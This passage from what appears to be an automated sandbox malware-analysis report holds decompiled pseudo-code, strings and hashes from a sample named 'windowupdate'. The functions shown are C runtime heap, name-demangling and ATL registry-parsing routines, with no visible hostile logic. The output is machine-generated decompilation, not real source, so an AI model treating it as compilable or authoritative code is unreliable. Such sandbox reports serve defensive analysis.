                      														if( *0xf206ec < 0xffffffff) {
                      															_t171 =  *0xf206ec; // 0x3329
                      															 *0xf206ec = _t171 - _v12[5];
                      															__eflags = (_t213 | 0xffffffff) -  *0xf206ec -  *_a8;
                      															if((_t213 | 0xffffffff) -  *0xf206ec <=  *_a8) {
                      																_v36 = 0xffffffff;
                      															} else {
                      																_v36 =  *_a8;
                      															}
                      															_t275 =  *0xf206ec; // 0x3329
                      															_t276 = _t275 + _v36;
                      															__eflags = _t276;
                      															 *0xf206ec = _t276;
                      														}
                      														_t232 =  *0xf206f0; // 0x22e4
                      														 *0xf206f0 = _t232 - _v12[5];
                      														_t169 =  *0xf206f0; // 0x22e4
                      														 *0xf206f0 = _t169 +  *_a8;
                      														_t234 =  *0xf206f0; // 0x22e4
                      														__eflags = _t234 -  *0xf206f4; // 0x22e4
                      														if(__eflags > 0) {
                      															_t272 =  *0xf206f0; // 0x22e4
                      															 *0xf206f4 = _t272;
                      														}
                      													}
                      													_t145 = E00D86370(_v12);
                      													_t294 = _t293 + 4;
                      													_v20 = _t145;
                      													_t253 = _v12;
                      													__eflags =  *_a8 -  *((intOrPtr*)(_t253 + 0x14));
                      													if( *_a8 >  *((intOrPtr*)(_t253 + 0x14))) {
                      														__eflags = _v20 + _v12[5];
                      														E00D4AF80(_t288, _v20 + _v12[5], 0xcd,  *_a8 - _v12[5]);
                      														_t294 = _t294 + 0xc;
                      													}
                      													E00D4AF80(_t288, _v20 +  *_a8, 0xfd, 4);
                      													_t295 = _t294 + 0xc;
                      													__eflags = _v5 & 0x000000ff;
                      													if((_v5 & 0x000000ff) == 0) {
                      														_v12[2] = _a16;
                      														_v12[3] = _a20;
                      														_v12[6] = _v24;
                      													}
                      													_v12[5] =  *_a8;
                      													__eflags = _a24 & 0x000000ff;
                      													if((_a24 & 0x000000ff) != 0) {
                      														L72:
                      														__eflags = _v12 - _v16;
                      														if(_v12 == _v16) {
                      															L74:
                      															return _v20;
                      														}
                      														__eflags = _v5 & 0x000000ff;
                      														if((_v5 & 0x000000ff) == 0) {
                      															__eflags =  *_v12;
                      															if( *_v12 == 0) {
                      																_t257 =  *0xf206e8; // 0x106fb00
                      																__eflags = _t257 - _v16;
                      																if(__eflags != 0) {
                      																	_t160 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2c5, 0, L"%ls", L"__acrt_last_block == old_head");
                      																	_t295 = _t295 + 0x18;
                      																	__eflags = _t160 - 1;
                      																	if(_t160 == 1) {
                      																		asm("int3");
                      																	}
                      																}
                      																 *0xf206e8 = _v12[1];
                      															} else {
                      																 *( *_v12 + 4) = _v12[1];
                      															}
                      															_t153 = _v12;
                      															__eflags =  *(_t153 + 4);
                      															if( *(_t153 + 4) == 0) {
                      																_t259 =  *0xf206e4; // 0x1071fd0
                      																__eflags = _t259 - _v16;
                      																if(__eflags != 0) {
                      																	_t158 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2cf, 0, L"%ls", L"__acrt_first_block == old_head");
                      																	__eflags = _t158 - 1;
                      																	if(_t158 == 1) {
                      																		asm("int3");
                      																	}
                      																}
                      																 *0xf206e4 =  *_v12;
                      															} else {
                      																 *(_v12[1]) =  *_v12;
                      															}
                      															__eflags =  *0xf206e4;
                      															if( *0xf206e4 == 0) {
                      																 *0xf206e8 = _v12;
                      															} else {
                      																_t157 =  *0xf206e4; // 0x1071fd0
                      																 *((intOrPtr*)(_t157 + 4)) = _v12;
                      															}
                      															_t221 =  *0xf206e4; // 0x1071fd0
                      															 *_v12 = _t221;
                      															_v12[1] = 0;
                      															 *0xf206e4 = _v12;
                      															return _v20;
                      														}
                      														goto L74;
                      													} else {
                      														__eflags = _a24 & 0x000000ff;
                      														if(__eflags != 0) {
                      															L70:
                      															_t162 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2b8, 0, L"%ls", L"reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)");
                      															_t295 = _t295 + 0x18;
                      															__eflags = _t162 - 1;
                      															if(_t162 == 1) {
                      																asm("int3");
                      															}
                      															goto L72;
                      														}
                      														__eflags = _v12 - _v16;
                      														if(__eflags == 0) {
                      															goto L72;
                      														}
                      														goto L70;
                      													}
                      												}
                      												return 0;
                      											}
                      											_t176 = E00D99820(_t211, _v16, _v32);
                      											_t293 = _t292 + 8;
                      											_v12 = _t176;
                      											__eflags = _v12;
                      											if(_v12 != 0) {
                      												goto L55;
                      											}
                      											return 0;
                      										}
                      										 *((intOrPtr*)(L00D82F70(_t210))) = 0xc;
                      										return 0;
                      									}
                      									__eflags =  *(_v16 + 0x18);
                      									if(__eflags == 0) {
                      										goto L42;
                      									}
                      									goto L40;
                      								}
                      							}
                      							_t239 = _a4;
                      							_t186 = L00D848E0(__eflags, 1, 0, 0, 0, "The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()", _a4);
                      							__eflags = _t186 - 1;
                      							if(_t186 == 1) {
                      								asm("int3");
                      							}
                      							 *((intOrPtr*)(L00D82F70(_t239))) = 0x16;
                      							return 0;
                      						}
                      						__eflags = (_a12 & 0x0000ffff) - 4;
                      						if((_a12 & 0x0000ffff) == 4) {
                      							goto L27;
                      						}
                      						__eflags = (_a12 & 0x0000ffff) - 2;
                      						if((_a12 & 0x0000ffff) == 2) {
                      							goto L27;
                      						}
                      						__eflags = _a16;
                      						if(__eflags == 0) {
                      							_t191 = L00D848E0(__eflags, 1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
                      							_t290 = _t289 + 0x18;
                      							__eflags = _t191 - 1;
                      							if(_t191 == 1) {
                      								asm("int3");
                      							}
                      						} else {
                      							_push(_a20);
                      							_t192 = L00D848E0(__eflags, 1, 0, 0, 0, "Error: memory allocation: bad memory block type.\n\nMemory allocated at %hs(%d).\n", _a16);
                      							_t290 = _t289 + 0x1c;
                      							__eflags = _t192 - 1;
                      							if(_t192 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						goto L31;
                      					}
                      					_t195 =  *0xdf6244; // 0xd9cb50
                      					_v28 = _t195;
                      					_t207 = _v28;
                      					 *0xdc62b0(2, _a4,  *_a8, _a12, _v24, _a16, _a20);
                      					_t197 = _v28();
                      					_t289 = _t289 + 0x1c;
                      					__eflags = _t197;
                      					if(_t197 != 0) {
                      						goto L17;
                      					}
                      					__eflags = _a16;
                      					if(__eflags == 0) {
                      						_t198 = L00D848E0(__eflags, 0, 0, 0, 0, "%s", "Client hook re-allocation failure.\n");
                      						__eflags = _t198 - 1;
                      						if(_t198 == 1) {
                      							asm("int3");
                      						}
                      						L16:
                      						return 0;
                      					}
                      					_push(_a20);
                      					_t200 = L00D848E0(__eflags, 0, 0, 0, 0, "Client hook re-allocation failure at file %hs line %d.\n", _a16);
                      					__eflags = _t200 - 1;
                      					if(_t200 == 1) {
                      						asm("int3");
                      					}
                      					goto L16;
                      				} else {
                      					__eflags =  *_a8;
                      					if(__eflags != 0) {
                      						goto L5;
                      					} else {
                      						L00D89480(__eflags, _a4, _a12);
                      						return 0;
                      					}
                      				}
                      			}
                      0x00d876b6
                      0x00000000
                      0x00d876d8
                      0x00d875ff
                      0x00d87604
                      0x00d87607
                      0x00d8760a
                      0x00d87610
                      0x00d87613
                      0x00d87616
                      0x00d87618
                      0x00000000
                      0x00000000
                      0x00d8761a
                      0x00d8761e
                      0x00d87657
                      0x00d8765f
                      0x00d87662
                      0x00d87664
                      0x00d87664
                      0x00d87665
                      0x00000000
                      0x00d87665
                      0x00d87623
                      0x00d87635
                      0x00d8763d
                      0x00d87640
                      0x00d87642
                      0x00d87642
                      0x00000000
                      0x00d87595
                      0x00d87598
                      0x00d8759b
                      0x00000000
                      0x00d8759d
                      0x00d875a5
                      0x00000000
                      0x00d875ad
                      0x00d8759b

                      APIs
                      Strings
                      • Client hook re-allocation failure at file %hs line %d., xrefs: 00D87628
                      • _CrtIsValidHeapPointer(block), xrefs: 00D8772E
                      • Error: memory allocation: bad memory block type., xrefs: 00D876B8
                      • __acrt_last_block == old_head, xrefs: 00D87A11
                      • Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 00D8769B
                      • The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 00D876F1
                      • reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 00D879B0
                      • minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00D8773F, 00D877AA, 00D879C1, 00D87A22, 00D87A77
                      • __acrt_first_block == old_head, xrefs: 00D87A66
                      • Error: possible heap corruption at or near 0x%p, xrefs: 00D877D3
                      • Client hook re-allocation failure., xrefs: 00D87645
                      • old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 00D87799
                      • %ls, xrefs: 00D87733, 00D8779E, 00D879B5, 00D87A16, 00D87A6B
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                      • API String ID: 3007373345-458177602
                      • Opcode ID: eca23fdd420a71fbf674e47b218cd9c863c28ff89436c911d825645cde351de2
                      • Instruction ID: b75ba0b7d2b0e4e983770e8513dc6ebfc49ed564cce6a9960ad91cb2abc7cbc4
                      • Opcode Fuzzy Hash: eca23fdd420a71fbf674e47b218cd9c863c28ff89436c911d825645cde351de2
                      • Instruction Fuzzy Hash: 6D02AD74A04209AFDB14EF54DC86FAE7BB1FB85700F248149E9159B392D770EA41CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D58210(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				signed int _v5;
                      				signed int _v6;
                      				signed char _v7;
                      				signed char _v8;
                      				char _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				char _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char _v68;
                      				char* _t60;
                      				char* _t66;
                      				void* _t67;
                      				char _t75;
                      				intOrPtr _t81;
                      				void* _t83;
                      				intOrPtr _t85;
                      				void* _t90;
                      				intOrPtr _t97;
                      				intOrPtr _t109;
                      				intOrPtr _t110;
                      				intOrPtr _t113;
                      				intOrPtr _t116;
                      				intOrPtr _t118;
                      				char* _t121;
                      				char* _t122;
                      				char* _t123;
                      				intOrPtr _t124;
                      				char* _t126;
                      				intOrPtr _t129;
                      				void* _t138;
                      				void* _t139;
                      				void* _t140;
                      
                      				_t139 = __esi;
                      				_t138 = __edi;
                      				_t90 = __ebx;
                      				_v6 = 1;
                      				E00D4F3F0( &_v36);
                      				 *0xf2064d = 1;
                      				while(E00D5AB70( &_v36) == 0) {
                      					_t60 =  *0xf20640; // 0x0
                      					if( *_t60 == 0) {
                      						break;
                      					}
                      					_t121 =  *0xf20640; // 0x0
                      					if( *_t121 == 0x40) {
                      						break;
                      					}
                      					_v7 = 0;
                      					if((_v6 & 0x000000ff) == 0) {
                      						_v7 = 1;
                      					} else {
                      						_v6 = 0;
                      					}
                      					_t122 =  *0xf20640; // 0x0
                      					_v16 =  *_t122 - 0x30;
                      					E00D4F3F0( &_v28);
                      					_v8 = 0;
                      					if(_v16 < 0 || _v16 > 9) {
                      						_t97 =  *0xf20640; // 0x0
                      						_v20 = _t97;
                      						_t123 =  *0xf20640; // 0x0
                      						if( *_t123 != 0x24) {
                      							L21:
                      							_t66 =  *0xf20640; // 0x0
                      							if( *_t66 != 0x24) {
                      								L24:
                      								_t67 = E00D58D00(_t90, _t138, _t139,  &_v68);
                      								_t140 = _t140 + 4;
                      								E00D4F820( &_v28, _t67);
                      								L25:
                      								_t124 =  *0xf20640; // 0x0
                      								if(_t124 - _v20 > 1) {
                      									_t109 =  *0xf2063c; // 0x0
                      									if(E00D5A590(_t109) == 0) {
                      										_t110 =  *0xf2063c; // 0x0
                      										E00D4FF70(_t110,  &_v28);
                      									}
                      								}
                      								goto L28;
                      							}
                      							_t81 =  *0xf20640; // 0x0
                      							if( *((char*)(_t81 + (1 << 0))) == 0x24) {
                      								goto L24;
                      							}
                      							_t129 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t129 + 1;
                      							_t83 = E00D586C0(_t90, _t138, _t139,  &_v60);
                      							_t140 = _t140 + 4;
                      							E00D4F820( &_v28, _t83);
                      							goto L25;
                      						}
                      						_t113 =  *0xf20640; // 0x0
                      						if( *((char*)(_t113 + 1)) != 0x24) {
                      							goto L21;
                      						}
                      						_v5 = 0;
                      						_t85 =  *0xf20640; // 0x0
                      						_v12 =  *((char*)(_t85 + 2));
                      						_v12 = _v12 - 0x24;
                      						if(_v12 > 0x36) {
                      							L19:
                      							if((_v5 & 0x000000ff) == 0) {
                      								goto L21;
                      							} else {
                      								continue;
                      							}
                      						}
                      						_t25 = _v12 + 0xd584bc; // 0xcccccc02
                      						switch( *((intOrPtr*)(( *_t25 & 0x000000ff) * 4 +  &M00D584A8))) {
                      							case 0:
                      								__edx =  *0xf20640;
                      								__eax =  *((char*)(__edx + 3));
                      								if( *((char*)(__edx + 3)) == 0x56) {
                      									__ecx =  *0xf20640; // 0x0
                      									__ecx = __ecx + 4;
                      									 *0xf20640 = __ecx;
                      									_v5 = 1;
                      								}
                      								goto L19;
                      							case 1:
                      								 *0xf20640 =  *0xf20640 + 3;
                      								 *0xf20640 =  *0xf20640 + 3;
                      								goto L19;
                      							case 2:
                      								__ecx =  *0xf20640;
                      								__ecx =  *0xf20640 + 3;
                      								 *0xf20640 = __ecx;
                      								_v5 = 1;
                      								goto L19;
                      							case 3:
                      								_v8 = 1;
                      								_t135 =  *0xf20640; // 0x0
                      								 *0xf20640 = _t135 + 3;
                      								goto L19;
                      							case 4:
                      								goto L19;
                      						}
                      					} else {
                      						_t116 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t116 + 1;
                      						_t118 =  *0xf2063c; // 0x0
                      						E00D4F820( &_v28, E00D4F9A0(_t118,  &_v52, _v16));
                      						L28:
                      						if(E00D5A560( &_v28) != 0) {
                      							if(E00D5A6C0( &_v28) != 0) {
                      								L36:
                      								continue;
                      							}
                      							E00D4F350(_a4, 2);
                      							return _a4;
                      						}
                      						if((_v7 & 0x000000ff) != 0) {
                      							E00D4FDE0( &_v36, 0x2c);
                      						}
                      						_t126 =  &_v28;
                      						E00D4FD40( &_v36, _t126);
                      						if((_v8 & 0x000000ff) != 0) {
                      							_t75 = E00D50060("...", 3);
                      							_t140 = _t140 + 8;
                      							_v44 = _t75;
                      							_v40 = _t126;
                      							E00D4FCA0( &_v36,  &_v44);
                      						}
                      						goto L36;
                      					}
                      				}
                      				 *0xf2064d = 0;
                      				E00D4F240(_a4,  &_v36);
                      				return _a4;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
                      • String ID: ...$6
                      • API String ID: 2413373717-4106199456
                      • Opcode ID: ca95b10de3820380f46c04bc7e29bc597391fccf0d1c2874aabf261ff6468cda
                      • Instruction ID: ce79900fea44320587d1bd5ea7555791994bf2e892e6c2b6706ad61e74343ae6
                      • Opcode Fuzzy Hash: ca95b10de3820380f46c04bc7e29bc597391fccf0d1c2874aabf261ff6468cda
                      • Instruction Fuzzy Hash: 2571D1719041589BEF24DF94D891ABE7FB1BF81306F084069DC06BB262DF349949EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D54900(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed char _a8) {
                      				signed int _v5;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				char _v80;
                      				char _v88;
                      				char _v96;
                      				char _v104;
                      				char _v112;
                      				char _v120;
                      				char _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				char _v160;
                      				char _v168;
                      				char* _t70;
                      				char* _t71;
                      				intOrPtr* _t81;
                      				char* _t99;
                      				void* _t113;
                      				char* _t136;
                      				intOrPtr _t137;
                      				char* _t142;
                      				char* _t146;
                      				char* _t147;
                      				intOrPtr _t149;
                      				char _t157;
                      				intOrPtr _t160;
                      				intOrPtr _t163;
                      				void* _t165;
                      				void* _t166;
                      
                      				_t166 = __esi;
                      				_t165 = __edi;
                      				_t113 = __ebx;
                      				_v5 = 0;
                      				_t70 =  *0xf20640; // 0x0
                      				if( *_t70 == 0x51) {
                      					_v5 = 1;
                      					_t163 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t163 + 1;
                      				}
                      				_t71 =  *0xf20640; // 0x0
                      				if( *_t71 != 0) {
                      					_t146 =  *0xf20640; // 0x0
                      					if( *_t146 < 0x30) {
                      						L10:
                      						E00D59C90( &_v80);
                      						if((E00D4FA10( &_v80) & 0x000000ff) == 0) {
                      							_t147 =  *0xf20640; // 0x0
                      							if( *_t147 != 0) {
                      								_v32 = E00D4F350( &_v168, 2);
                      							} else {
                      								_v32 = E00D4F350( &_v160, 1);
                      							}
                      							_v48 = _v32;
                      							E00D4F240(_a4, _v48);
                      							return _a4;
                      						}
                      						_t149 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t149 + 1;
                      						_t81 = E00D4FA30( &_v80);
                      						_v16 =  *_t81;
                      						_v12 =  *((intOrPtr*)(_t81 + 4));
                      						if((_a8 & 0x000000ff) == 0) {
                      							if((_v5 & 0x000000ff) == 0) {
                      								_v28 = E00D4F510(_t113,  &_v152, _t165, _t166, _v16, _v12);
                      							} else {
                      								_v28 = E00D4FAA0( &_v144, 0xdf6030, E00D4F510(_t113,  &_v136, _t165, _t166, _v16, _v12));
                      							}
                      							_v44 = _v28;
                      							E00D4F240(_a4, _v44);
                      							return _a4;
                      						}
                      						if((_v5 & 0x000000ff) == 0) {
                      							_v24 = E00D4F420(_t113,  &_v128, _t165, _t166, _v16, _v12);
                      						} else {
                      							_v24 = E00D4FAA0( &_v120, 0xdf6030, E00D4F420(_t113,  &_v112, _t165, _t166, _v16, _v12));
                      						}
                      						_v40 = _v24;
                      						E00D4F240(_a4, _v40);
                      						return _a4;
                      					}
                      					_t136 =  *0xf20640; // 0x0
                      					_t157 =  *_t136;
                      					if(_t157 > 0x39) {
                      						goto L10;
                      					}
                      					if((_v5 & 0x000000ff) == 0) {
                      						_t99 =  *0xf20640; // 0x0
                      						asm("cdq");
                      						_v64 =  *_t99 - 0x2f;
                      						_v60 = _t157;
                      						_t137 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t137 + 1;
                      						_v20 = E00D4F510(_t113,  &_v104, _t165, _t166, _v64, _v60);
                      					} else {
                      						_t142 =  *0xf20640; // 0x0
                      						asm("cdq");
                      						_v56 =  *_t142 - 0x2f;
                      						_v52 = _t157;
                      						_t160 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t160 + 1;
                      						_v20 = E00D4FAA0( &_v96, 0xdf6030, E00D4F510(_t113,  &_v88, _t165, _t166, _v56, _v52));
                      					}
                      					_v36 = _v20;
                      					E00D4F240(_a4, _v36);
                      					return _a4;
                      				} else {
                      					E00D4F350(_a4, 1);
                      					return _a4;
                      				}
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D5493E
                      • operator+.LIBVCRUNTIMED ref: 00D549B3
                        • Part of subcall function 00D4FAA0: DName::operator+.LIBCMTD ref: 00D4FAC0
                      • DName::DName.LIBVCRUNTIMED ref: 00D549A4
                        • Part of subcall function 00D4F510: __aullrem.LIBCMT ref: 00D4F557
                        • Part of subcall function 00D4F510: __aulldiv.LIBCMT ref: 00D4F570
                      • DName::DName.LIBVCRUNTIMED ref: 00D549EC
                      • Mailbox.LIBCMTD ref: 00D54A01
                      • DName::DName.LIBVCRUNTIMED ref: 00D54A6A
                      • operator+.LIBVCRUNTIMED ref: 00D54A79
                      • DName::DName.LIBVCRUNTIMED ref: 00D54A91
                      • Mailbox.LIBCMTD ref: 00D54AA6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
                      • String ID:
                      • API String ID: 2030757049-0
                      • Opcode ID: 1697ba1a25da6aff486a29fd7e1192a8a3dd11ad5aba72ac37eff19b0e34788a
                      • Instruction ID: fe2e44b895a9933b6efc5a9fd3a9eabe7603ebe1e4f2c3328ce5ed027a26cc3a
                      • Opcode Fuzzy Hash: 1697ba1a25da6aff486a29fd7e1192a8a3dd11ad5aba72ac37eff19b0e34788a
                      • Instruction Fuzzy Hash: 15717571D04118AFDF14DF94D8919EEBBB5FF88305F148169E819A7261DB30AA45CF70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00D386D0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                      				signed int _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v44;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v57;
                      				signed int _v64;
                      				char _v72;
                      				signed int _v84;
                      				signed int _v96;
                      				signed int _v104;
                      				intOrPtr _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				char _v124;
                      				signed int _v136;
                      				signed int _v156;
                      				char _v168;
                      				signed int _v180;
                      				char _v192;
                      				signed int _v200;
                      				signed int _v201;
                      				signed int _v220;
                      				signed int _v240;
                      				signed int _v252;
                      				signed int _v264;
                      				signed int _v284;
                      				signed int _v289;
                      				signed int _v308;
                      				signed int _v328;
                      				signed int _v340;
                      				signed int _v352;
                      				signed int _v360;
                      				signed int _v364;
                      				char _v1396;
                      				signed int _v1404;
                      				CHAR* _v1408;
                      				CHAR* _v1412;
                      				signed int _v1428;
                      				signed int _v1433;
                      				signed int _v1452;
                      				signed int _v1472;
                      				signed int _v1484;
                      				signed int _v1496;
                      				signed int _v1508;
                      				char _v1520;
                      				signed int _v1540;
                      				signed int _v1545;
                      				void _v1564;
                      				signed int _v1584;
                      				void _v1596;
                      				signed int _v1608;
                      				signed int _v1620;
                      				char _v2656;
                      				signed int _v2668;
                      				signed int _v2676;
                      				signed int _v2680;
                      				signed int _v2696;
                      				signed int _v2704;
                      				signed int _v2708;
                      				signed int _v2712;
                      				signed int _v2716;
                      				intOrPtr _v2720;
                      				signed int _v2724;
                      				signed int _v2728;
                      				signed int _v2732;
                      				intOrPtr _v2736;
                      				intOrPtr _v2740;
                      				intOrPtr _v2744;
                      				char _v2752;
                      				char _v2760;
                      				intOrPtr _v2764;
                      				intOrPtr _v2768;
                      				intOrPtr _v2772;
                      				intOrPtr _v2776;
                      				char _v2784;
                      				char _v2792;
                      				intOrPtr _v2796;
                      				intOrPtr _v2800;
                      				intOrPtr _v2804;
                      				char _v2812;
                      				signed int _v2816;
                      				signed int _v2820;
                      				signed int _v2824;
                      				signed int _v2828;
                      				signed int _v2832;
                      				signed int _v2836;
                      				signed int _v2840;
                      				signed int _v2844;
                      				signed int _v2848;
                      				signed int _v2852;
                      				signed int _v2856;
                      				signed int _v2860;
                      				signed int _v2864;
                      				signed int _v2868;
                      				signed int _v2872;
                      				signed int _v2876;
                      				signed int _v2880;
                      				signed int _v2884;
                      				signed int _v2888;
                      				signed int _v2892;
                      				signed int _v2896;
                      				signed int _v2900;
                      				signed int _v2904;
                      				void _v2908;
                      				signed int _t754;
                      				signed int _t755;
                      				signed int _t769;
                      				void* _t775;
                      				signed int _t783;
                      				signed int _t805;
                      				signed int _t807;
                      				signed int _t817;
                      				void* _t818;
                      				intOrPtr _t820;
                      
                      				_push(0xffffffff);
                      				_push(0xdc4ec4);
                      				_push( *[fs:0x0]);
                      				memset( &_v2908, 0xcccccccc, 0x2d2 << 2);
                      				_t820 = _t818 - 0xb48 + 0xc;
                      				_pop(_t783);
                      				_t754 =  *0xdf600c; // 0x71e60372
                      				_t755 = _t754 ^ _t817;
                      				_v24 = _t755;
                      				_push(_t755);
                      				 *[fs:0x0] =  &_v16;
                      				_v20 = _t820;
                      				_v28 = _t783;
                      				E00D341C0( &_v44, 0);
                      				_v8 = 0;
                      				_v52 = 0;
                      				_v56 = 0;
                      				_v57 = 0;
                      				_v64 = 0;
                      				_v104 = 0;
                      				_v108 = E00D31AB0();
                      				_v112 = 0;
                      				_v116 = 0;
                      				E00D3F2E0( &_v124);
                      				_v8 = 1;
                      				_t805 =  *( *_a8);
                      				E00D3A0F0(_v28, _t805,  &_v72,  &_v84,  &_v96);
                      				while(_v72 != 6) {
                      					_v2820 = _v72;
                      					if(_v2820 > 0xb) {
                      						_t805 = 0;
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t775 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x31a, 0, "%ls", 0xde40dc);
                      							_t820 = _t820 + 0x18;
                      							__eflags = _t775 - 1;
                      							if(_t775 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						L204:
                      						continue;
                      					}
                      					switch( *((intOrPtr*)(_v2820 * 4 +  &M00D3A0BC))) {
                      						case 0:
                      							_v2704 = 0;
                      							_v8 = 0;
                      							E00D3F220( &_v124);
                      							_v8 = 0xffffffff;
                      							E00D34220( &_v44, _t824);
                      							_t769 = _v2704;
                      							goto L206;
                      						case 1:
                      							_v57 = 1;
                      							__eflags = _a24;
                      							if(__eflags == 0) {
                      								L8:
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__eax = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx =  &_v96;
                      								__edx =  &_v84;
                      								__eax =  &_v72;
